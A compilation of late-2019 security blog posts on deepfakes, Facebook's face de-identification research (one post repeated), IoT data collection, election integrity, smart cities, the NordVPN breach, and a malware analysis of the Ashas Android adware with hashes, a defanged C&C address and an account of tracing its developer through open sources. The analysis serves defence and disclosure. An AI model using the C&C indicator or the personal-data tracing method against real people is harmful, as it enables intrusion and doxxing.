Deepfakes: When seeing isn’t believing

Is the world as we know it ready for the real impact of deepfakes?

Deepfakes are rapidly becoming easier and quicker to create and they’re opening a door into a new form of cybercrime. Although the fake videos are still mostly seen as relatively harmful or even humorous, this craze could take a more sinister turn in the future and be at the heart of political scandals, cybercrime, or even unimaginable scenarios involving fake videos – and not just targeting public figures.

A deepfake is the technique of human-image synthesis based on artificial intelligence to create fake content either from scratch or using existing video designed to replicate the look and sound of a real human. Such videos can look incredibly real and currently many of these videos involve celebrities or public figures saying something outrageous or untrue.

New research shows a huge increase in the creation of deepfake videos, with the number online almost doubling in the last nine months alone. Deepfakes are increasing in quality at a swift rate, too. This video showing Bill Hader morphing effortlessly between Tom Cruise and Seth Rogan is just one example of how authentic these videos are looking, as well as sounding. Searching YouTube for the term ‘deepfake’ it will make you realize we are viewing the tip of the iceberg of what is to come.

In fact, we have already seen deepfake technology used for fraud, where a deepfaked voice was reportedly used to scam a CEO out of a large sum of cash. It is believed the CEO of an unnamed UK firm thought he was on the phone to the CEO of the German parent company and followed the orders to immediately transfer €220,000 (roughly US$244,000) to a Hungarian supplier’s bank account. If it was this easy to influence someone by just asking them to do it over the phone, then surely we will need better security in place to mitigate this threat.

Fooling the naked eye

We have also seen apps making deepnudes turning photos of any clothed person into a topless photo in seconds. Although, luckily, one particular app, DeepNude, has now been taken offline, what if this comes back in another form with a vengeance and is able to create convincingly authentic-looking video?

There is also evidence that the production of these videos is becoming a lucrative business especially in the pornography industry. The BBC says “96% of these videos are of female celebrities having their likenesses swapped into sexually explicit videos – without their knowledge or consent”.

A recent Californian bill has taken a leap of faith and made it illegal to create a pornographic deepfake of someone without their consent with a penalty of up to $150,000. But chances are that no legislation will be enough to deter some people from fabricating the videos.

To be sure, an article from the Economist discusses that in order to make a convincing enough deepfake you would need a serious amount of video footage and/or voice recordings in order to make even a short deepfake clip. I desperately wanted to create a deepfake of myself but sadly, without many hours of footage of myself, I wasn’t able to make a deepfake of my face.

Having said that, in the not-too-distant future, it may be entirely possible to take just a few short Instagram stories to create a deepfake that is believed by the majority of one’s followers online or by anyone else who knows them. We may see some unimaginable videos appearing of people closer to home – the boss, our colleagues, our peers, our family. Additionally, deepfakes may also be used for bullying in schools, the office or even further afield.

Furthermore, cybercriminals will definitely use this technology more to spearphish victims. Deepfakes keep getting cheaper to create and become near-impossible to detect with the human eye alone. As a result, all that fakery could very easily muddy the water between fact and fiction, which in turn could lead us to not trust anything – even when presented with what our senses are telling us to believe.

Heading off the very real threat

So, what can be done to prepare us for this threat? First, we need to better educate people that deepfakes exist, how they work and the potential damage they can cause. We will all need to learn to treat even the most realistic videos we see that they could be total fabrications.

Secondly, technology desperately needs to develop better detection of deepfakes. There is already research going into it, but it’s nowhere near where it should be yet. Although machine learning is at the heart of creating them in the first place, there needs to be something in place that acts as the antidote being able to detect them without relying on human eyes alone.

Finally, social media platforms need to realize there is a huge potential threat with the impact of deepfakes because when you mix a shocking video with social media, the outcome tends to spread very rapidly and potentially could have a detrimental impact on society.

Don’t get me wrong; I hugely enjoy the development in technology and watching it unfold in front of my eyes, however, we must remain aware of how technology can sometimes detrimentally affect us, especially when machine learning is maturing at a rate quicker than ever before. Otherwise, we will soon see deepfakes become deepnorms with far-reaching effects.

31 Oct 2019 – 11:30AM

Facebook builds tool to confound facial recognition

However, the social network harbors no plans to deploy the technology in any of its services any time soon

Facebook has developed a machine-learning method that aims to help with face de-identification in video content. In its paper, the Facebook AI research team explains it has developed the technology in response to ethical concerns that arise from misuse of face replacement technology. One example is the unsettling popularity of deepfakes.

Among other ‘tricks’, Facebook’s technology relies on altering lip positioning, illumination and shadows. It involves creating a video so that no visible distortions appear, meaning that only the face is subtly altered whereas everything else in the video looks the same. In other words, the new method aims to alter the person’s appearance in a way that the face appears more or less the same to the human eye, but is different enough to confound facial recognition.

The technology was tested in a series of experiments involving both state-of-the-art facial recognition systems and actual people. The volunteers were told about how the videos had been manipulated, and they were able to tell the real video from the distorted one some 50 percent of the time.

[embedded content]

Video source: Oran Gafni/YouTube

The paper concludes that with the advances in facial recognition technology (and its abuse), there is a greater need for understanding and creating methods that are able to counter such abuse.

Meanwhile, VentureBeat quoted a Facebook spokesperson as saying that the social network has no plans to leverage this technology in any of its products in the foreseeable future. Still, the researchers believe that their work could lead to the development of tools that help safeguard people’s privacy.

With the gradual erosion of privacy – which many fear may be partly caused by the use of facial recognition systems but might especially have to do with their potential for being misused – this is a welcome sight.

30 Oct 2019 – 05:59PM

Facebook builds tool to confound facial recognition

However, the social network harbors no plans to deploy the technology in any of its services any time soon

Facebook has developed a machine-learning method that aims to help with face de-identification in video content. In its paper, the Facebook AI research team explains it has developed the technology in response to ethical concerns that arise from misuse of face replacement technology. One example is the unsettling popularity of deepfakes.

Among other ‘tricks’, Facebook’s technology relies on altering lip positioning, illumination and shadows. It involves creating a video so that no visible distortions appear, meaning that only the face is subtly altered whereas everything else in the video looks the same. In other words, the new method aims to alter the person’s appearance in a way that the face appears more or less the same to the human eye, but is different enough to confound facial recognition.

The technology was tested in a series of experiments involving both state-of-the-art facial recognition systems and actual people. The volunteers were told about how the videos had been manipulated, and they were able to tell the real video from the distorted one some 50 percent of the time.

[embedded content]

Video source: Oran Gafni/YouTube

The paper concludes that with the advances in facial recognition technology (and its abuse), there is a greater need for understanding and creating methods that are able to counter such abuse.

Meanwhile, VentureBeat quoted a Facebook spokesperson as saying that the social network has no plans to leverage this technology in any of its products in the foreseeable future. Still, the researchers believe that their work could lead to the development of tools that help safeguard people’s privacy.

With the gradual erosion of privacy – which many fear may be partly caused by the use of facial recognition systems but might especially have to do with their potential for being misused – this is a welcome sight.

30 Oct 2019 – 05:59PM

What you may be getting wrong about cybersecurity

Attention-grabbing cyberattacks that use fiendish exploits are probably not the kind of threat that should be your main concern – here’s what your organization should focus on instead

When we hear about breaches, we assume that attackers used some never-before-seen, zero-day exploit to breach our defenses. This situation is normally far from the truth. While it is true that nation-states hold onto tastily crafted zero days that they use to infiltrate the most nationally significant targets, those targets are not you. And they’re probably not your organization, either.

At this year’s Virus Bulletin Conference, much like in years past, we were regaled with many tales of attacks against financially important, high-profile targets. But in the end, the bad actors didn’t get in with the scariest ’sploits. They got in with a phishing email, or, as in a case that one presenter from RiskIQ highlighted, they used wide-open permissions within a very popular cloud resource.

The truth is that the soft underbelly of the security industry consists of hackers taking the path of least resistance: quite often this path is paved with misconfigured security software, human error, or other operational security issues. In other words, it’s not super-“l33t” hackers; it’s you.

Even if you think you’re doing everything right within your own organization, that may still not be enough. While you may have thoroughly secured your own network, those you interact with may not be so locked down. You may think that you’ve successfully eschewed third-party software, that you don’t use the cloud for collaboration, so you’re safe in your enclave. However, third parties situated within your supply chain may be using cloud services in ways that endanger you. And sometimes neither you nor they even know that this situation has created significant risk to both of your environments.

Not to worry, you’re not alone, and there are things you can do about it.

High-profile breaches these days often start with third parties you use. While you might have the greatest security team out there, maybe they don’t.

Not sure? Here are a few obvious (or not-so-obvious) things you can check with your teams:

Cloud permissions
It’s certainly convenient for teams sharing cloud resources – especially as a file share – to have full permissions on files to add/change/delete for anyone. But this could also open you up to trouble. Especially for projects and teams that are hastily thrown together, “temporary” cloud-based resource may be tossed together without considering best security practices. This often includes everyone having wide-open permissions so that everything “just works”. And these resources have a way of outlasting a Hollywood marriage by years, all the while exposing a huge gap in your defenses. Collaboration platforms
Do your teams or your third-party vendors use unsecured and/or unmonitored messaging services, forums or platforms to discuss your business? If criminals (or even competitors!) can access internal communications about your business, this could cause huge problems. At the very least, they could give significant resources to attackers looking to socially engineer their way into your network. Corporate email compromise
How well have you locked down the ability to send email from your domain? Could that flood of phish be coming from inside your own house? If you’re not taking good care of your email security, attackers could be using your good name to steal the trust they need in order to fool people into clicking malicious links. Too few companies are using email authentication strategies like DMARC, DKIM or SPF to help verify valid messages, which is something we’d like to see change for the better!

It certainly can be tempting to keep searching for what flashy and dramatic new threats attackers are finding, but in the end it’s most important to make sure you’re filling the simple cracks within your own edifice. As technology becomes more ubiquitous, it also introduces more complexity. By thoroughly addressing these simpler (if unexpected) problems, we can devote less brainpower to stressing out about the space-age techniques that are being used against high-value targets, and use that reclaimed mental bandwidth to make things actually more secure.

and 29 Oct 2019 – 11:30AM

Week in security with Tony Anscombe

This week, ESET researchers released their findings on Winnti Group’s MSSQL backdoor and showed how they’d tracked down the operator of an adware campaign that victimized millions of Android users.

ESET researchers uncover a previously undocumented backdoor that targets Microsoft SQL servers and allows attackers to maintain a very discreet foothold inside compromised organizations. Also this week, ESET researchers published their findings about a year-long adware campaign that victimized millions of Android users. And, as cities seek to become smart cities, we ponder the risks of failing to consider the security of smart technologies.

Your smart doorbell may be collecting more data than you think, study finds

The study tested 81 IoT devices to analyze their behavior and tracking habits, and in some cases brought rather surprising findings

Have you stopped to think what kind of data may be collected by an innocuously-looking smart device, where the information is sent, and whether it is encrypted? Researchers at Northeastern University and Imperial College London have looked into this very issue and conducted a range of experiments in controlled environments in both the United States and the United Kingdom.

Their paper shows that the researchers took an interesting approach by configuring their US lab to look like a studio apartment with all the IoT devices integrated. The “studio lab” was used by 36 participants over six months, who interacted with the devices in a way that would be common in day-to-day use. These experiments were uncontrolled and consisted of capturing all the unlabeled traffic generated by the devices. The full results of the experiments are outlined in the full paper, called Information Exposure From Consumer IoT Devices.

For example, two of the tested smart doorbells were shown to perform rather unexpected tasks. The integrated camera on one of the doorbells uploaded a snapshot after its first activation and every time someone moved in front of it – a feature that was not disclosed anywhere. Curiously, there was no way to access these snapshots, which begs the question: where were these snapshots being uploaded and why wasn’t there a way to access them?

The other doorbell, meanwhile, recorded a video every time a user moved in front of it, and the companion app that is used to set up the device failed to disclose that a real-time recording was being captured, although this information could be found in the privacy policy. That said, when the researchers tried to log into the account associated with the doorbell, they found out that the recordings are accessible only after a monthly fee is paid. Upon further investigation, they couldn’t find a way to disable this feature.

The study also analyzed where the IoT devices send some of their network traffic. The companies that were contacted by most devices (31 from the US and 24 from the UK) send the data to at least one server run on Amazon Web Services (AWS), the cloud platform of choice of most companies in the study. The other frequently contacted addresses were those of cloud platforms that belong to Microsoft or Google.

When it comes to tested smart TVs, almost all of them contacted Netflix. Which is curious since none of the TVs were ever configured with a Netflix account. A contrast between the US and the European Union can be seen in that the devices in the US lab contacted more non-first parties, which may be attributed to the less strict privacy regulations in comparison to those of the EU. One of our recent articles looked at how streaming devices track people’s viewing habits.

On one hand, the conclusion does not seem all that bleak, with the researchers praising the fact that a number of devices used encryption to protect their users’ personal data, with minimal exposure in plain text. On the other hand, devices that do lack encryption may expose people’s data to prying eyes and allow them to work out how the devices are being used.

These kinds of studies offer valuable insight into what some IoT devices are up to and what kind of data they collect – especially if we consider that many of us may not have healthy cybersecurity habits, as evidenced by a recent survey conducted by ESET.

25 Oct 2019 – 12:43PM

Facebook lays out plan to protect elections

How is the social network preparing to curtail the spread of misinformation as the election season heats up?

From congressional hearings to meeting with law enforcement and intelligence officials, social media companies have been in the spotlight in advance of the 2020 election season. Indeed, the 2016 US presidential election, which was mired in controversy and allegations of election meddling, is still fresh in the minds of some. So, it comes as no surprise that social media behemoths are ramping up their game, preparing measures to ward off threats to election integrity.

With the 2020 US presidential election just over a year away, Facebook, for one, announced measures earlier this week that are designed to stop election interference. Their efforts are concentrated into three main pillars: fighting interference, increasing transparency, and reducing misinformation. Each of these pillars is broken down into a variety of steps that the social network takes to achieve these goals.

Combating inauthentic behavior is one of such steps. An example would be Facebook’s removal of Pages, Groups, accounts on both Facebook and Instagram exerting influence by engaging in coordinated manipulative activities. The plug was pulled based on the behavior of these accounts and not purely on the content shared.

The social network has also launched a new Facebook Protect feature, which adds an extra layer of security to the accounts of political figures and their staff. The feature includes mandatory two-factor authentication, and accounts using Facebook Protect will be actively monitored for hacking. On the other hand, the social media giant admits that the measure is not foolproof, stating in their press release that “because campaigns are generally run for a short period of time, we don’t always know who these campaign-affiliated people are, making it harder to help protect them”.

To curb misinformation on both Facebook and Instagram, they reduce its distribution to a lower number of people and remove it from the Explore and News Feed features. If content has been rated false or partly false using a third-party fact-checker, it will be labeled as such and will be up to the users’ discretion to determine if it is trustworthy or not. If users attempt to share such content, a pop-up will appear to warn them that the post in question contains false information debunked by the fact-checker.

To increase transparency, Facebook now provides users with the ability to check the provenance of the page by sharing its primary country location and if it has merged with other pages. In addition, more context is provided by extra information that must be disclosed such as “Organizations that manage this Page” tab. This tab will contain the organization’s legal name, verified city, phone number, and website. This will be visible on Pages that have a great number of US audiences and have undergone Facebook’s business verification process.

A new approach will be implemented towards state-controlled media and towards media outlets that are wholly or partially under the editorial control of their government. These outlets will be labeled both on their Page and in Facebook’s Ad Library and will be held to a higher standard of transparency.

Meanwhile, Twitter disclosed its efforts in preventing platform manipulation last month. It plans to keep enhancing its efforts in this area, by routinely disclosing data that is related to state-backed information operations on their network.

24 Oct 2019 – 05:27PM

Tracking down the developer of Android adware affecting millions of users

ESET researchers discovered a year-long adware campaign on Google Play and tracked down its operator. The apps involved, installed eight million times, use several tricks for stealth and persistence.

We detected a large adware campaign running for about a year, with the involved apps installed eight million times from Google Play alone.

We identified 42 apps on Google Play as belonging to the campaign, which had been running since July 2018. Of those, 21 were still available at the time of discovery. We reported the apps to the Google security team and they were swiftly removed. However, the apps are still available in third-party app stores. ESET detects this adware, collectively, as Android/AdDisplay.Ashas.

Figure 1. Apps of the Android/AdDisplay.Ashas family reported to Google by ESET

Figure 2. The most popular member of the Android/AdDisplay.Ashas family on Google Play was “Video downloader master” with over five million downloads

Ashas functionality

All the apps provide the functionality they promise, besides working as adware. The adware functionality is the same in all the apps we analyzed. [Note: The analysis of the functionality below describes a single app, but applies to all apps of the Android/AdDisplay.Ashas family.]

Once launched, the app starts to communicate with its C&C server (whose IP address is base64-encoded in the app). It sends “home” key data about the affected device: device type, OS version, language, number of installed apps, free storage space, battery status, whether the device is rooted and Developer mode enabled, and whether Facebook and FB Messenger are installed.

Figure 3. Sending information about the affected device

The app receives configuration data from the C&C server, needed for displaying ads, and for stealth and resilience.

Figure 4. Configuration file received from the C&C server

As for stealth and resilience, the attacker uses a number of tricks.

First, the malicious app tries to determine whether it is being tested by the Google Play security mechanism. For this purpose, the app receives from the C&C server the isGoogleIp flag, which indicates whether the IP address of the affected device falls within the range of known IP addresses for Google servers. If the server returns this flag as positive, the app will not trigger the adware payload.

Second, the app can set a custom delay between displaying ads. The samples we have seen had their configuration set to delay displaying the first ad by 24 minutes after the device unlocks. This delay means that a typical testing procedure, which takes less than 10 minutes, will not detect any unwanted behavior. Also, the longer the delay, the lower the risk of the user associating the unwanted ads with a particular app.

Third, based on the server response, the app can also hide its icon and create a shortcut instead. If a typical user tries to get rid of the malicious app, chances are that only the shortcut ends up getting removed. The app then continues to run in the background without the user’s knowledge. This stealth technique has been gaining popularity among adware-related threats distributed via Google Play.

Figure 5. Time delay to postpone displaying ads implemented by the adware

Once the malicious app receives its configuration data, the affected device is ready to display ads as per the attacker’s choice; each ad is displayed as a full screen activity. If the user wants to check which app is responsible for the ad being displayed, by hitting the “Recent apps” button, another trick is used: the app displays a Facebook or Google icon, as seen in Figure 6. The adware mimics these two apps to look legitimate and avoid suspicion – and thus stay on the affected device for as long as possible.

Figure 6. The adware activity impersonates Facebook (left). If the user long-presses the icon, the name of the app responsible for the activity is revealed (right).

Finally, the Ashas adware family has its code hidden under the com.google.xxx package name. This trick – posing as a part of a legitimate Google service – may help avoid scrutiny. Some detection mechanisms and sandboxes may whitelist such package names, in an effort to prevent wasting resources.

Figure 7. Malicious code hidden in a package named “com.google”

Hunting down the developer

Using open-source information, we tracked down the developer of the adware, who we also identified as the campaign’s operator and owner of the C&C server. In the following paragraphs, we outline our  efforts to discover other applications from the same developer and protect our users from it.

First, based on information that is associated with the registered C&C domain, we identified the name of the registrant, along with further data like country and email address, as seen in Figure 8.

Figure 8. Information about the C&C domain used by the Ashas adware

Knowing that the information provided to a domain registrar might be fake, we continued our search. The email address and country information drove us to a list of students attending a class at a Vietnamese university – corroborating the existence of the person under whose name the domain was registered.

Figure 9. A university class student list including the C&C domain registrant

Due to poor privacy practices on the part of our culprit’s university, we now know his date of birth (probably: he seemingly used his birth year as part of his Gmail address, as further partial confirmation), we know that he was a student and what university he attended. We were also able to confirm that the phone number he provided to the domain registrar was genuine. Moreover, we retrieved his University ID; a quick googling showed some of his exam grades. However, his study results are out of the scope of our research.

Based on our culprit’s email address, we were able to find his GitHub repository. His repository proves that he is indeed an Android developer, but it contained no publicly available code of the Ashas adware at the time of writing of this blogpost.

However, a simple Google search for the adware package name returned a “TestDelete” project that had been available in his repository at some point

The malicious developer also has apps in Apple’s App Store. Some of them are iOS versions of the ones removed from Google Play, but none contain adware functionality.

Figure 10. The malicious developer’s apps published on the App Store which don’t contain the Ashas adware

Searching further for the malicious developer’s activities, we also discovered his Youtube channel propagating the Ashas adware and his other projects. As for the Ashas family, one of the associated promotional videos, “Head Soccer World Champion 2018 – Android, ios” was viewed almost three million times and two others reached hundreds of thousands of views, as seen in Figure 11.

Figure 11. YouTube channel of the malicious developer

His YouTube channel provided us with another valuable piece of information: he himself features in a video tutorial for one of his other projects. Thanks to that project, we were able to extract his Facebook profile – which lists his studies at the aforementioned university.

Figure 12. Facebook profile of the C&C domain registrar (cover picture and profile picture edited out)

Linked on the malicious developer’s Facebook profile, we discovered a Facebook page, Minigameshouse, and an associated domain, minigameshouse[.]net. This domain is similar to the one the malware author used for his adware C&C communication, minigameshouse[.]us.

Checking this Minigameshouse page further indicates that this person is indeed the owner of the minigameshouse[.]us domain: the phone number registered with this domain is the same as the phone number appearing on the Facebook page.

Figure 13. Facebook page managed by the C&C domain registrant uses the same base domain name (minigameshouse) and phone number as the registered malicious C&C used by the Ashas adware

Of interest is that on the Minigameshouse Facebook page, the malicious developer promotes a slew of games beyond the Ashas family for download on both Google Play and the App Store. However, all of those have been removed from Google Play – despite the fact that some of them didn’t contain any adware functionality.

On top of all this, one of the malicious developer’s YouTube videos – a tutorial on developing an “Instant Game” for Facebook – serves as an example of operational security completely ignored. We were able to see that his recently visited web sites were Google Play pages belonging to apps containing the Ashas adware. He also used his email account to log into various services in the video, which identifies him as the adware domain owner, beyond any doubt.

Thanks to the video, we were even able to identify three further apps that contained adware functionality and were available on Google Play.

Figure 14. Screenshots from this developer’s YouTube video shows history of checking Ashas adware on Google Play

ESET telemetry

Figure 15. ESET detections of Android/AdDisplay.Ashas on Android devices by country

Is adware harmful?

Because the real nature of apps containing adware is usually hidden to the user, these apps and their developers should be considered untrustworthy. When installed on a device, apps containing adware may, among other things:

  • Annoy users with intrusive advertisements, including scam ads
  • Waste the device’s battery resources
  • Generate increased network traffic
  • Gather users’ personal information
  • Hide their presence on the affected device to achieve persistence
  • Generate revenue for their operator without any user interaction

Conclusion

Based solely on open source intelligence, we were able to trace the developer of the Ashas adware and establish his identity and discover additional related adware-infected apps. Seeing that the developer did not take any measures to protect his identity, it seems likely that his intentions weren’t dishonest at first – and this is also supported by the fact that not all his published apps contained unwanted ads.

At some point in his Google Play “career”, he apparently decided to increase his ad revenue by implementing adware functionality in his apps’ code. The various stealth and resilience techniques implemented in the adware show us that the culprit was aware of the malicious nature of the added functionality and attempted to keep it hidden.

Sneaking unwanted or harmful functionality into popular, benign apps is a common practice among “bad” developers, and we are committed to tracking down such apps. We report them to Google and take other steps to disrupt malicious campaigns we discover. Last but not least, we publish our findings to help Android users protect themselves.

Indicators of Compromise (IoCs)

Package name Hash Installs
com.ngocph.masterfree c1c958afa12a4fceb595539c6d208e6b103415d7 5,000,000+
com.mghstudio.ringtonemaker 7a8640d4a766c3e4c4707f038c12f30ad7e21876 500,000+
com.hunghh.instadownloader 8421f9f25dd30766f864490c26766d381b89dbee 500,000+
com.chungit.tank1990 237f9bfe204e857abb51db15d6092d350ad3eb01 500,000+
com.video.downloadmasterfree 43fea80444befe79b55e1f05d980261318472dff 100,000+
com.massapp.instadownloader 1382c2990bdce7d0aa081336214b78a06fceef62 100,000+
com.chungit.tankbattle 1630b926c1732ca0bb2f1150ad491e19030bcbf2 100,000+
com.chungit.basketball 188ca2d47e1fe777c6e9223e6f0f487cb5e98f2d 100,000+
com.applecat.worldchampion2018 502a1d6ab73d0aaa4d7821d6568833028b6595ec 100,000+
org.minigamehouse.photoalbum a8e02fbd37d0787ee28d444272d72b894041003a 100,000+
com.mngh.tuanvn.fbvideodownloader 035624f9ac5f76cc38707f796457a34ec2a97946 100,000+
com.v2social.socialdownloader 2b84fb67519487d676844e5744d8d3d1c935c4b7 100,000+
com.hikeforig.hashtag 8ed42a6bcb14396563bb2475528d708c368da316 100,000+
com.chungit.heroesjump c72e92e675afceca23bbe77008d921195114700c 100,000+
com.mp4.video.downloader 61E2C86199B2D94ABF2F7508300E3DB44AE1C6F1 100,000+
com.videotomp4.downloader 1f54e35729a5409628511b9bf6503863e9353ec9 50,000+
boxs.puzzles.Puzzlebox b084a07fdfd1db25354ad3afea6fa7af497fb7dc 50,000+
com.intatwitfb.download.videodownloader 8d5ef663c32c1dbcdd5cd7af14674a02fed30467 50,000+
com.doscreenrecorder.screenrecorder e7da1b95e5ddfd2ac71587ad3f95b2bb5c0f365d 50,000+
com.toptools.allvideodownloader 32E476EA431C6F0995C75ACC5980BDBEF07C8F7F 50,000+
com.top1.videodownloader a24529933f57aa46ee5a9fd3c3f7234a1642fe17 10,000+
com.santastudio.headsoccer2 86d48c25d24842bac634c2bd75dbf721bcf4e2ea 10,000+
com.ringtonemakerpro.ringtonemakerapp2019 5ce9f25dc32ac8b00b9abc3754202e96ef7d66d9 10,000+
com.hugofq.solucionariodebaldor 3bb546880d93e9743ac99ad4295ccaf982920260 10,000+
com.anit.bouncingball 6e93a24fb64d2f6db2095bb17afa12c34b2c8452 10,000+
com.dktools.liteforfb 7bc079b1d01686d974888aa5398d6de54fd9d116 10,000+
net.radiogroup.tvnradio ba29f0b4ad14b3d77956ae70d812eae6ac761bee 10,000+
com.anit.bouncingball 6E93A24FB64D2F6DB2095BB17AFA12C34B2C8452 10,000+
com.floating.tube.bymuicv 6A57D380CDDCD4726ED2CF0E98156BA404112A53 10,000+
org.cocos2dx.SpiderSolitaireGames adbb603195c1cc33f8317ba9f05ae9b74759e75b 5,000+
games.puzzle.crosssum 31088dc35a864158205e89403e1fb46ef6c2c3cd 5,000+
dots.yellow.craft 413ce03236d3604c6c15fc8d1ec3c9887633396c 5,000+
com.tvngroup.ankina.reminderWater 5205a5d78b58a178c389cd1a7b6651fe5eb7eb09 5,000+
com.hdevs.ringtonemaker2019 ba5a4220d30579195a83ddc4c0897eec9df59cb7 5,000+
com.carlosapps.solucionariodebaldor 741a95c34d3ad817582d27783551b5c85c4c605b 5,000+
com.mngh1.flatmusic 32353fae3082eaeedd6c56bb90836c89893dc42c 5,000+
com.tvn.app.smartnote ddf1f864325b76bc7c0a7cfa452562fe0fd41351 1,000+
com.thrtop.alldownloader f46ef932a5f8e946a274961d5bdd789194bd2a7d 1,000+
com.anthu91.soccercard 0913a34436d1a7fcd9b6599fba64102352ef2a4a 1,000+
com.hugofq.wismichudosmildiecisiete 4715bd777d0e76ca954685eb32dc4d16e609824f 1,000+
com.gamebasketball.basketballperfectshot e97133aaf7d4bf90f93fefb405cb71a287790839 1,000+
com.nteam.solitairefree 3095f0f99300c04f5ba877f87ab86636129769b1 100+
com.instafollowers.hiketop 3a14407c3a8ef54f9cba8f61a271ab94013340f8 1+

C&C server

http://35.198.197[.]119:8080

MITRE ATT&CK techniques

Tactic ID Name Description
Initial Access T1475 Deliver Malicious App via Authorized App Store The malware impersonates legitimate services on Google Play
Persistence T1402 App Auto-Start at Device Boot An Android application can listen for the BOOT_COMPLETED broadcast, ensuring that the app’s functionality will be activated every time the device starts
Impact T1472 Generate Fraudulent Advertising Revenue Generates revenue by automatically displaying ads

Kudos to @jaymin9687 for bringing the problem of unwanted ads in the “Video downloader master” app to our attention.

24 Oct 2019 – 11:30AM

Smart cities must be cyber‑smart cities

As cities turn to IoT to address long-standing urban problems, what are the risks of leaving cybersecurity behind at the planning phase?

You’ve probably heard the term “smart cities” – that is, the idea that extensive use of Information and Communications Technology (ICT) to monitor energy, utilities and transportation infrastructure can lead to cost savings, reduction of environmental impact and faster fault resolution.

The benefits are obvious. If a street lamp fails, and can tell you so, you can replace it more quickly. If you can control traffic more efficiently, you’ll reduce smog and noise, and reduce overall journey times. If you can tie AC/heating to ambient temperature in a fine-grained way, you can reduce power consumption and wastage. If you can track traffic in real time, you can plan the best routes for emergency response vehicles.

Most national governments have committed to the Paris Agreement, and therefore need to reach targets for reduced carbon emissions. These targets necessarily pass down to the regional and municipal levels, and the implementation of smart technologies in urban areas has a large part to play in achieving those goals. However, where there are complex, interconnected, computer-controlled networks of thousands of Internet of Things (IoT) sensors and devices, all sorts of alarm bells start to ring in the minds of cybersecurity practitioners.

ESET researchers have analyzed malware (e.g. here and here) that was most probably used in several attacks against the energy industry and ultimately caused power outages. This sort of disruption has major effects on people’s lives, and intermittent or unreliable power does not take long to cause problems. Foods and medicines start to decay rapidly as refrigeration and freezers start to heat up. Hospitals must reduce power consumption to the essentials. Petrol pumps don’t work (nor for that matter do smart vehicle charging stations), traffic light systems go down, buildings start to over-heat, or over-cool. Street lighting stops working. Electronic payment doesn’t work, wages may not be paid, ATMs don’t dispense cash. You can’t recharge your phone or your laptop. Your insulin pump won’t charge, your CPAP (continuous positive airway pressure) device won’t work, nor will your remote monitoring systems, your security cameras – or your coffee machine! It doesn’t take much to understand that in these circumstances chaos quickly ensues.

We can also imagine more subtle attacks than total electricity outages. There have been at least two major cases of illicit cryptocurrency-mining software on compromised nuclear power plant control systems. Cryptocurrency mining is incredibly power-intensive, and therefore has a high environmental impact – in addition to the cost and the potential to cause power distribution problems as described above. It’s not just companies that are affected by such attacks. In many (most?) cases, IoT devices are not well secured, and their vulnerabilities can lead to an attack where there is little user-initiated mitigation possible. Last year a large-scale operation was discovered using home internet routers to mine cryptocurrency. Where there is money to be made, and easily – given the vulnerability of the systems – there will be criminal exploitation.

Smart meters are a boon to utility companies as well as consumers and businesses, allowing precise monitoring of utility consumption, but their compromise can enable the theft of power/gas/water. Perhaps worse – such meters can also indicate how much generated power is being put into the grid (think rooftop solar) and the rest of the grid depends on that being accurate to do proper load balancing and generation. As is often the case with failures of security, it’s the unforeseen events that can have the most devastating results.

The European Union (EU) has been very active in implementing smart city technologies, among other IoT-driven projects, with many set up under the aegis of its research and innovation program called Horizon 2020. These projects vary in scope, but many have vast implications for the sectors they affect – smart cites and society, agriculture, healthcare, ocean and water management, food, manufacturing, and many other aspects of lives.

Some of these projects are governed by Mission Boards that serve to guide and advise on the projects’ implementation. (Full disclosure: I was one of 550 applicants to the Mission Board for Climate-Neutral and Smart Cities, but did not obtain a seat, of which there were 15.)

The boards are made up of members working in a diverse range of disciplines, and we should hope that cybersecurity will be foremost in their thoughts, although it is scarcely mentioned in the briefs for the boards.

When all is said and done, there will be tremendous benefits in implementing technologies that can improve lives and reduce environmental impact. On the other hand, we should never forget the risks that come with failing to consider the security of those technologies.

23 Oct 2019 – 11:30AM

NordVPN reveals breach at datacenter provider

The company says that the incident, going back to March 2018, affected only 1 out of its 3,000 servers

The well-known virtual private network (VPN) provider NordVPN admitted to a breach on Tuesday that had occurred at one of the facilities from which the company rents its servers.

The bad actors exploited an insecure remote management system left by the unnamed Finland-based datacenter provider – with NordVPN saying that it wasn’t even aware of such a system being in use. The incident goes back to March 2018 and NordVPN said it had learned about it “a few months ago”. The company also gave assurances that the server in question did not contain any user activity logs and no user credentials were intercepted.

Nevertheless, the incident compromised a now-expired TLS key. NordVPN claims that there is no conceivable way the key could be used to decrypt VPN traffic on other servers operated by the company and further attempted to tone down the concerns:

“On the same note, the only possible way to abuse website traffic was by performing a personalized and complicated MitM [man-in-the-middle] attack to intercept a single connection that tried to access nordvpn.com,” said the company.

NordVPN also claims that immediately after the incident was discovered they conducted a thorough audit of the whole infrastructure to investigate if there were any other weak points that could be exploited. The contract with the Finnish datacenter was terminated. The reason stated for the late disclosure of the breach is the infrastructure audit which, according to the company, took a longer amount of time due to the sheer number of servers maintained by the service.

NordVPN said it took steps to fix the problem, by speeding up the encryption of their servers and creating a process of moving all their servers to RAM, which is expected to be concluded some time next year. Additional security measures are being put in place. Another audit is being conducted, a bug bounty program is being prepared and data centers will have to meet stricter requirements for cooperation, said the company.

22 Oct 2019 – 04:16PM